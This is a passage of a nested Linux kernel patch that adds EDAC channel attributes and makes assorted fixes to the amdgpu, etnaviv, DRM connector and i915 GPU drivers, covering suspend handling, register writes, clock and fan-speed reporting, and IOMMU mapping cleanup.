+ /* Total possible dynamic DIMM Label attribute file table */
+ static struct attribute *dynamic_csrow_dimm_attr[] = {
+@@ -309,6 +317,10 @@ static struct attribute *dynamic_csrow_dimm_attr[] = {
+ 	&dev_attr_legacy_ch5_dimm_label.attr.attr,
+ 	&dev_attr_legacy_ch6_dimm_label.attr.attr,
+ 	&dev_attr_legacy_ch7_dimm_label.attr.attr,
++	&dev_attr_legacy_ch8_dimm_label.attr.attr,
++	&dev_attr_legacy_ch9_dimm_label.attr.attr,
++	&dev_attr_legacy_ch10_dimm_label.attr.attr,
++	&dev_attr_legacy_ch11_dimm_label.attr.attr,
+ 	NULL
+ };
+ 
+@@ -329,6 +341,14 @@ DEVICE_CHANNEL(ch6_ce_count, S_IRUGO,
+ 		   channel_ce_count_show, NULL, 6);
+ DEVICE_CHANNEL(ch7_ce_count, S_IRUGO,
+ 		   channel_ce_count_show, NULL, 7);
++DEVICE_CHANNEL(ch8_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 8);
++DEVICE_CHANNEL(ch9_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 9);
++DEVICE_CHANNEL(ch10_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 10);
++DEVICE_CHANNEL(ch11_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 11);
+ 
+ /* Total possible dynamic ce_count attribute file table */
+ static struct attribute *dynamic_csrow_ce_count_attr[] = {
+@@ -340,6 +360,10 @@ static struct attribute *dynamic_csrow_ce_count_attr[] = {
+ 	&dev_attr_legacy_ch5_ce_count.attr.attr,
+ 	&dev_attr_legacy_ch6_ce_count.attr.attr,
+ 	&dev_attr_legacy_ch7_ce_count.attr.attr,
++	&dev_attr_legacy_ch8_ce_count.attr.attr,
++	&dev_attr_legacy_ch9_ce_count.attr.attr,
++	&dev_attr_legacy_ch10_ce_count.attr.attr,
++	&dev_attr_legacy_ch11_ce_count.attr.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 913f22d41673d..0be85d19a6f3e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3005,14 +3005,15 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 			continue;
+ 		}
+ 
+-		/* skip suspend of gfx and psp for S0ix
++		/* skip suspend of gfx/mes and psp for S0ix
+ 		 * gfx is in gfxoff state, so on resume it will exit gfxoff just
+ 		 * like at runtime. PSP is also part of the always on hardware
+ 		 * so no need to suspend it.
+ 		 */
+ 		if (adev->in_s0ix &&
+ 		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP ||
+-		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_GFX))
++		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_GFX ||
++		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index bf2d50c8c92ad..d8dfbb9b735dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2040,6 +2040,15 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 			 "See modparam exp_hw_support\n");
+ 		return -ENODEV;
+ 	}
++	/* differentiate between P10 and P11 asics with the same DID */
++	if (pdev->device == 0x67FF &&
++	    (pdev->revision == 0xE3 ||
++	     pdev->revision == 0xE7 ||
++	     pdev->revision == 0xF3 ||
++	     pdev->revision == 0xF7)) {
++		flags &= ~AMD_ASIC_MASK;
++		flags |= CHIP_POLARIS10;
++	}
+ 
+ 	/* Due to hardware bugs, S/G Display on raven requires a 1:1 IOMMU mapping,
+ 	 * however, SME requires an indirect IOMMU mapping because the encryption
+@@ -2109,12 +2118,12 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 
+ 	pci_set_drvdata(pdev, ddev);
+ 
+-	ret = amdgpu_driver_load_kms(adev, ent->driver_data);
++	ret = amdgpu_driver_load_kms(adev, flags);
+ 	if (ret)
+ 		goto err_pci;
+ 
+ retry_init:
+-	ret = drm_dev_register(ddev, ent->driver_data);
++	ret = drm_dev_register(ddev, flags);
+ 	if (ret == -EAGAIN && ++retry <= 3) {
+ 		DRM_INFO("retry init %d\n", retry);
+ 		/* Don't request EX mode too frequently which is attacking */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 2e8f6cd7a7293..3df13d841e4d5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1509,7 +1509,8 @@ u64 amdgpu_bo_gpu_offset_no_check(struct amdgpu_bo *bo)
+ uint32_t amdgpu_bo_get_preferred_domain(struct amdgpu_device *adev,
+ 					    uint32_t domain)
+ {
+-	if (domain == (AMDGPU_GEM_DOMAIN_VRAM | AMDGPU_GEM_DOMAIN_GTT)) {
++	if ((domain == (AMDGPU_GEM_DOMAIN_VRAM | AMDGPU_GEM_DOMAIN_GTT)) &&
++	    ((adev->asic_type == CHIP_CARRIZO) || (adev->asic_type == CHIP_STONEY))) {
+ 		domain = AMDGPU_GEM_DOMAIN_VRAM;
+ 		if (adev->gmc.real_vram_size <= AMDGPU_SG_THRESHOLD)
+ 			domain = AMDGPU_GEM_DOMAIN_GTT;
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index f141fadd2d86f..725876b4f02ed 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -1339,7 +1339,8 @@ static int mes_v11_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	if (!amdgpu_in_reset(adev) &&
++	/* it's only intended for use in mes_self_test case, not for s0ix and reset */
++	if (!amdgpu_in_reset(adev) && !adev->in_s0ix &&
+ 	    (adev->ip_versions[GC_HWIP][0] != IP_VERSION(11, 0, 3)))
+ 		amdgpu_mes_self_test(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
+index 998b5d17b271b..0e664d0cc8d51 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
+@@ -319,7 +319,7 @@ static void mmhub_v2_0_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = mmMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, mmMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, mmMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v2_0_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
+index 1b027d069ab40..4638ea7c2eec5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
+@@ -243,7 +243,7 @@ static void mmhub_v2_3_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = mmMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, mmMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, mmMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v2_3_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
+index a1d26c4d80b8c..16cc82215e2e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
+@@ -275,7 +275,7 @@ static void mmhub_v3_0_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
+index e8058edc1d108..6bdf2ef0298d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
+@@ -269,7 +269,7 @@ static void mmhub_v3_0_1_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_1_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
+index 770be0a8f7ce7..45465acaa943a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
+@@ -268,7 +268,7 @@ static void mmhub_v3_0_2_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_2_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 512c32327eb11..c2c26fbea5129 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1512,6 +1512,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		case IP_VERSION(3, 0, 1):
+ 		case IP_VERSION(3, 1, 2):
+ 		case IP_VERSION(3, 1, 3):
++		case IP_VERSION(3, 1, 4):
+ 		case IP_VERSION(3, 1, 5):
+ 		case IP_VERSION(3, 1, 6):
+ 			init_data.flags.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+index b76f0f7e42998..d6b964cf73bd1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+@@ -522,9 +522,9 @@ typedef enum  {
+   TEMP_HOTSPOT_M,
+   TEMP_MEM,
+   TEMP_VR_GFX,
++  TEMP_VR_SOC,
+   TEMP_VR_MEM0,
+   TEMP_VR_MEM1,
+-  TEMP_VR_SOC,
+   TEMP_VR_U,
+   TEMP_LIQUID0,
+   TEMP_LIQUID1,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 865d6358918d2..a9122b3b15322 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -28,6 +28,7 @@
+ #define SMU13_DRIVER_IF_VERSION_INV 0xFFFFFFFF
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x34
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 89f0f6eb19f3d..8e4830a311bde 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -289,6 +289,8 @@ int smu_v13_0_check_fw_version(struct smu_context *smu)
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_ALDE;
+ 		break;
+ 	case IP_VERSION(13, 0, 0):
++		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0;
++		break;
+ 	case IP_VERSION(13, 0, 10):
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index f0121d1716301..b8430601304f0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -187,6 +187,8 @@ static struct cmn2asic_mapping smu_v13_0_0_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(MEM_TEMP_READ),
+ 	FEA_MAP(ATHUB_MMHUB_PG),
+ 	FEA_MAP(SOC_PCC),
++	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_table_map[SMU_TABLE_COUNT] = {
+@@ -517,6 +519,23 @@ static int smu_v13_0_0_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		/*
++		 * Update the reported maximum shader clock to the value
++		 * which can be guarded to be achieved on all cards. This
++		 * is aligned with Window setting. And considering that value
++		 * might be not the peak frequency the card can achieve, it
++		 * is normal some real-time clock frequency can overtake this
++		 * labelled maximum clock frequency(for example in pp_dpm_sclk
++		 * sysfs output).
++		 */
++		if (skutable->DriverReportedClocks.GameClockAc &&
++		    (dpm_table->dpm_levels[dpm_table->count - 1].value >
++		    skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -779,6 +798,57 @@ static int smu_v13_0_0_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_0_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_0_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1281,9 +1351,17 @@ static int smu_v13_0_0_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++			pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++	    (driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1300,12 +1378,12 @@ static int smu_v13_0_0_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++	    driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1339,12 +1417,23 @@ out:
+ static int smu_v13_0_0_get_fan_speed_pwm(struct smu_context *smu,
+ 					 uint32_t *speed)
+ {
++	int ret;
++
+ 	if (!speed)
+ 		return -EINVAL;
+ 
+-	return smu_v13_0_0_get_smu_metrics_data(smu,
+-						METRICS_CURR_FANPWM,
+-						speed);
++	ret = smu_v13_0_0_get_smu_metrics_data(smu,
++					       METRICS_CURR_FANPWM,
++					       speed);
++	if (ret) {
++		dev_err(smu->adev->dev, "Failed to get fan speed(PWM)!");
++		return ret;
++	}
++
++	/* Convert the PMFW output which is in percent to pwm(255) based */
++	*speed = MIN(*speed * 255 / 100, 255);
++
++	return 0;
+ }
+ 
+ static int smu_v13_0_0_get_fan_speed_rpm(struct smu_context *smu,
+@@ -1813,7 +1902,7 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.get_enabled_mask = smu_cmn_get_enabled_mask,
+ 	.dpm_set_vcn_enable = smu_v13_0_set_vcn_enable,
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_0_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_0_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 39deb06a86ba3..222924363a681 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -189,6 +189,8 @@ static struct cmn2asic_mapping smu_v13_0_7_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(MEM_TEMP_READ),
+ 	FEA_MAP(ATHUB_MMHUB_PG),
+ 	FEA_MAP(SOC_PCC),
++	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_table_map[SMU_TABLE_COUNT] = {
+@@ -1359,12 +1361,23 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ static int smu_v13_0_7_get_fan_speed_pwm(struct smu_context *smu,
+ 					 uint32_t *speed)
+ {
++	int ret;
++
+ 	if (!speed)
+ 		return -EINVAL;
+ 
+-	return smu_v13_0_7_get_smu_metrics_data(smu,
+-						METRICS_CURR_FANPWM,
+-						speed);
++	ret = smu_v13_0_7_get_smu_metrics_data(smu,
++					       METRICS_CURR_FANPWM,
++					       speed);
++	if (ret) {
++		dev_err(smu->adev->dev, "Failed to get fan speed(PWM)!");
++		return ret;
++	}
++
++	/* Convert the PMFW output which is in percent to pwm(255) based */
++	*speed = MIN(*speed * 255 / 100, 255);
++
++	return 0;
+ }
+ 
+ static int smu_v13_0_7_get_fan_speed_rpm(struct smu_context *smu,
+diff --git a/drivers/gpu/drm/drm_connector.c b/drivers/gpu/drm/drm_connector.c
+index 61c29ce74b035..27de2a97f1d11 100644
+--- a/drivers/gpu/drm/drm_connector.c
++++ b/drivers/gpu/drm/drm_connector.c
+@@ -582,6 +582,9 @@ void drm_connector_cleanup(struct drm_connector *connector)
+ 	mutex_destroy(&connector->mutex);
+ 
+ 	memset(connector, 0, sizeof(*connector));
++
++	if (dev->registered)
++		drm_sysfs_hotplug_event(dev);
+ }
+ EXPORT_SYMBOL(drm_connector_cleanup);
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem.c b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+index cc386f8a7116e..5cf13e52f7c94 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+@@ -258,7 +258,12 @@ struct etnaviv_vram_mapping *etnaviv_gem_mapping_get(
+ 		if (mapping->use == 0) {
+ 			mutex_lock(&mmu_context->lock);
+ 			if (mapping->context == mmu_context)
+-				mapping->use += 1;
++				if (va && mapping->iova != va) {
++					etnaviv_iommu_reap_mapping(mapping);
++					mapping = NULL;
++				} else {
++					mapping->use += 1;
++				}
+ 			else
+ 				mapping = NULL;
+ 			mutex_unlock(&mmu_context->lock);
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+index dc1aa738c4f18..55479cb8b1ac3 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+@@ -135,6 +135,19 @@ static void etnaviv_iommu_remove_mapping(struct etnaviv_iommu_context *context,
+ 	drm_mm_remove_node(&mapping->vram_node);
+ }
+ 
++void etnaviv_iommu_reap_mapping(struct etnaviv_vram_mapping *mapping)
++{
++	struct etnaviv_iommu_context *context = mapping->context;
++
++	lockdep_assert_held(&context->lock);
++	WARN_ON(mapping->use);
++
++	etnaviv_iommu_remove_mapping(context, mapping);
++	etnaviv_iommu_context_put(mapping->context);
++	mapping->context = NULL;
++	list_del_init(&mapping->mmu_node);
++}
++
+ static int etnaviv_iommu_find_iova(struct etnaviv_iommu_context *context,
+ 				   struct drm_mm_node *node, size_t size)
+ {
+@@ -202,10 +215,7 @@ static int etnaviv_iommu_find_iova(struct etnaviv_iommu_context *context,
+ 		 * this mapping.
+ 		 */
+ 		list_for_each_entry_safe(m, n, &list, scan_node) {
+-			etnaviv_iommu_remove_mapping(context, m);
+-			etnaviv_iommu_context_put(m->context);
+-			m->context = NULL;
+-			list_del_init(&m->mmu_node);
++			etnaviv_iommu_reap_mapping(m);
+ 			list_del_init(&m->scan_node);
+ 		}
+ 
+@@ -257,10 +267,7 @@ static int etnaviv_iommu_insert_exact(struct etnaviv_iommu_context *context,
+ 	}
+ 
+ 	list_for_each_entry_safe(m, n, &scan_list, scan_node) {
+-		etnaviv_iommu_remove_mapping(context, m);
+-		etnaviv_iommu_context_put(m->context);
+-		m->context = NULL;
+-		list_del_init(&m->mmu_node);
++		etnaviv_iommu_reap_mapping(m);
+ 		list_del_init(&m->scan_node);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.h b/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
+index e4a0b7d09c2ea..c01a147f0dfdd 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
+@@ -91,6 +91,7 @@ int etnaviv_iommu_map_gem(struct etnaviv_iommu_context *context,
+ 	struct etnaviv_vram_mapping *mapping, u64 va);
+ void etnaviv_iommu_unmap_gem(struct etnaviv_iommu_context *context,
+ 	struct etnaviv_vram_mapping *mapping);
++void etnaviv_iommu_reap_mapping(struct etnaviv_vram_mapping *mapping);
+ 
+ int etnaviv_iommu_get_suballoc_va(struct etnaviv_iommu_context *ctx,
+ 				  struct etnaviv_vram_mapping *mapping,
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 75e8cc4337c93..fce69fa446d58 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -137,9 +137,9 @@ static enum port intel_dsi_seq_port_to_port(struct intel_dsi *intel_dsi,
+ 		return ffs(intel_dsi->ports) - 1;
+ 
+ 	if (seq_port) {
+-		if (intel_dsi->ports & PORT_B)
++		if (intel_dsi->ports & BIT(PORT_B))
+ 			return PORT_B;
+-		else if (intel_dsi->ports & PORT_C)
++		else if (intel_dsi->ports & BIT(PORT_C))
+ 			return PORT_C;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+index 845023c14eb36..f461e34cc5f07 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+@@ -729,32 +729,69 @@ static int eb_reserve(struct i915_execbuffer *eb)
+ 	bool unpinned;
+ 
+ 	/*
+-	 * Attempt to pin all of the buffers into the GTT.
+-	 * This is done in 2 phases:
++	 * We have one more buffers that we couldn't bind, which could be due to
++	 * various reasons. To resolve this we have 4 passes, with every next
++	 * level turning the screws tighter:
+ 	 *
+-	 * 1. Unbind all objects that do not match the GTT constraints for
+-	 *    the execbuffer (fenceable, mappable, alignment etc).
+-	 * 2. Bind new objects.
++	 * 0. Unbind all objects that do not match the GTT constraints for the
++	 * execbuffer (fenceable, mappable, alignment etc). Bind all new
++	 * objects.  This avoids unnecessary unbinding of later objects in order
++	 * to make room for the earlier objects *unless* we need to defragment.
+ 	 *
+-	 * This avoid unnecessary unbinding of later objects in order to make
+-	 * room for the earlier objects *unless* we need to defragment.
++	 * 1. Reorder the buffers, where objects with the most restrictive
++	 * placement requirements go first (ignoring fixed location buffers for
++	 * now).  For example, objects needing the mappable aperture (the first
++	 * 256M of GTT), should go first vs objects that can be placed just
++	 * about anywhere. Repeat the previous pass.
+ 	 *
+-	 * Defragmenting is skipped if all objects are pinned at a fixed location.
++	 * 2. Consider buffers that are pinned at a fixed location. Also try to
++	 * evict the entire VM this time, leaving only objects that we were
++	 * unable to lock. Try again to bind the buffers. (still using the new
++	 * buffer order).
++	 *
++	 * 3. We likely have object lock contention for one or more stubborn
++	 * objects in the VM, for which we need to evict to make forward
++	 * progress (perhaps we are fighting the shrinker?). When evicting the
